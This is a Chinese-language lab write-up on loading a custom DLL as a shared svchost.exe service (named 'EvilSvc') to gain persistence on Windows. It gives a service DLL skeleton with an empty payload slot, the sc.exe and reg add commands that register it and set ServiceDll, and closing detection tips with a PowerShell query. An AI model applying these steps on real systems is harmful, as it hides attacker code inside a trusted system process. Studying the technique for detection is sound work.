svchost.exe挂载DLL


工作原理

实验过程

用 VS 新建类库，编译一个处理服务控制循环响应的 DLL

#include "pch.h"
#define SVCNAME TEXT("EvilSvc")


SERVICE_STATUS serviceStatus;               // status record reported to the SCM; dwCurrentState is updated via UpdateServiceStatus, the other fields are filled in by ServiceMain
SERVICE_STATUS_HANDLE serviceStatusHandle;  // handle returned by the control-handler registration in ServiceMain
HANDLE stopEvent = NULL;                    // manual-reset event created in ExecuteServiceCode and signalled by ServiceHandler on STOP/SHUTDOWN


VOID UpdateServiceStatus(DWORD currentState)
{
    // Record the new state in the shared status block and push it to the SCM.
    // All other fields of serviceStatus are left exactly as ServiceMain set them;
    // the SetServiceStatus result is deliberately ignored (nothing to report it to).
    SERVICE_STATUS *status = &serviceStatus;
    status->dwCurrentState = currentState;
    (void)SetServiceStatus(serviceStatusHandle, status);
}


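DWORD WINAPI ServiceHandler(DWORD controlCode, DWORD eventType, LPVOID eventData, LPVOID context)
{
    // Control handler the SCM invokes on the service's control-dispatcher thread.
    // The four-parameter / DWORD-return shape is the HandlerEx contract; eventType,
    // eventData and context are unused. WINAPI is required because the SCM calls this
    // through a stdcall function pointer (without it the x86 build corrupts the stack).
    // Returns NO_ERROR for every code, as before; an unsupported code could instead
    // return ERROR_CALL_NOT_IMPLEMENTED so the SCM reports it to the caller.
    (void)eventType;
    (void)eventData;
    (void)context;

    DWORD reportedState = serviceStatus.dwCurrentState;

    switch (controlCode)
    {
        case SERVICE_CONTROL_STOP:
        case SERVICE_CONTROL_SHUTDOWN:
            // Announce STOP_PENDING only; the worker in ExecuteServiceCode reports
            // SERVICE_STOPPED once it has observed the event and cleaned up.
            reportedState = SERVICE_STOP_PENDING;
            if (stopEvent != NULL)   // the event is created after the handler is registered
            {
                SetEvent(stopEvent);
            }
            break;
        case SERVICE_CONTROL_PAUSE:
            reportedState = SERVICE_PAUSED;
            break;
        case SERVICE_CONTROL_CONTINUE:
            reportedState = SERVICE_RUNNING;
            break;
        case SERVICE_CONTROL_INTERROGATE:
        default:
            // Re-report the current state unchanged.
            break;
    }

    // Report the state the handler actually transitioned to. The original called
    // UpdateServiceStatus(SERVICE_RUNNING) unconditionally, which overwrote the
    // PAUSED/STOPPED value it had just written into serviceStatus.
    UpdateServiceStatus(reportedState);

    return NO_ERROR;
}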


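VOID ExecuteServiceCode()
{
    // Worker body: create the stop event, report RUNNING, block until a STOP/SHUTDOWN
    // control signals the event, then report STOPPED and release the handle.
    // Failures are surfaced to the SCM through serviceStatus.dwWin32ExitCode.
    stopEvent = CreateEvent(NULL, TRUE, FALSE, NULL);   // manual-reset, initially unsignalled
    if (stopEvent == NULL)
    {
        // Without the event the service could never be stopped cleanly, so fail startup
        // and tell the SCM why (the original went on to wait on a NULL handle).
        serviceStatus.dwWin32ExitCode = GetLastError();
        UpdateServiceStatus(SERVICE_STOPPED);
        return;
    }

    UpdateServiceStatus(SERVICE_RUNNING);

    // #####################################
    // service work goes here
    // #####################################

    // A single blocking wait replaces the original while (1) loop, whose body
    // returned on its first iteration anyway.
    if (WaitForSingleObject(stopEvent, INFINITE) == WAIT_FAILED)
    {
        serviceStatus.dwWin32ExitCode = GetLastError();
    }

    UpdateServiceStatus(SERVICE_STOPPED);

    // Once STOPPED has been reported the SCM sends no further controls, so the handler
    // no longer touches stopEvent and the handle (leaked by the original) can be closed.
    HANDLE eventToClose = stopEvent;
    stopEvent = NULL;
    CloseHandle(eventToClose);
}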


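extern "C" __declspec(dllexport) VOID WINAPI ServiceMain(DWORD argC, LPWSTR * argV)
{
    // Entry point the host process calls on its own thread for the service named SVCNAME.
    // argC/argV are the start parameters supplied by the SCM and are not used here.
    // Registers the control handler, fills in the status block, then hands over to
    // ExecuteServiceCode, which returns only after the service has stopped.
    (void)argC;
    (void)argV;

    // ServiceHandler has the HandlerEx shape (four parameters, DWORD return), so register it
    // through the Ex API with the matching pointer type. The original used
    // RegisterServiceCtrlHandler with an LPHANDLER_FUNCTION cast, which hid that mismatch.
    // The cast below is only needed while ServiceHandler lacks the WINAPI calling convention.
    serviceStatusHandle = RegisterServiceCtrlHandlerEx(SVCNAME, (LPHANDLER_FUNCTION_EX)ServiceHandler, NULL);
    if (serviceStatusHandle == 0)
    {
        // Nothing can be reported to the SCM without a handle; the original called
        // SetServiceStatus with the failed (zero) handle anyway.
        return;
    }

    serviceStatus.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;   // hosted inside a shared process
    // The original never set dwControlsAccepted, leaving it 0, so the SCM rejected every
    // stop/shutdown request and the STOP branch of ServiceHandler was unreachable in practice.
    serviceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN | SERVICE_ACCEPT_PAUSE_CONTINUE;
    serviceStatus.dwWin32ExitCode = NO_ERROR;
    serviceStatus.dwServiceSpecificExitCode = 0;
    serviceStatus.dwCheckPoint = 0;
    serviceStatus.dwWaitHint = 0;

    UpdateServiceStatus(SERVICE_START_PENDING);
    ExecuteServiceCode();
}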

创建EvilSvc服务

sc.exe create EvilSvc binPath= "c:\windows\System32\svchost.exe -k DcomLaunch" type= share start= auto

修改EvilSvc DLL路径为自己的DLL路径

reg add HKLM\SYSTEM\CurrentControlSet\services\EvilSvc\Parameters /v ServiceDll /t REG_EXPAND_SZ /d C:\Windows\system32\EvilSvc.dll /f

注册表查看该服务如下

修改svchost组里的DcomLaunch
(添加创建的服务名)

启动EvilSvc服务

sc start EvilSvc

检测技术

* 检查最近创建的、以 svchost.exe 作为 binPath 的服务
* 列出所有系统服务的 ServiceDll 值并逐一检查
Get-ItemProperty hklm:\SYSTEM\ControlSet001\Services\*\Parameters | ? { $_.servicedll } | select psparentpath, servicedll

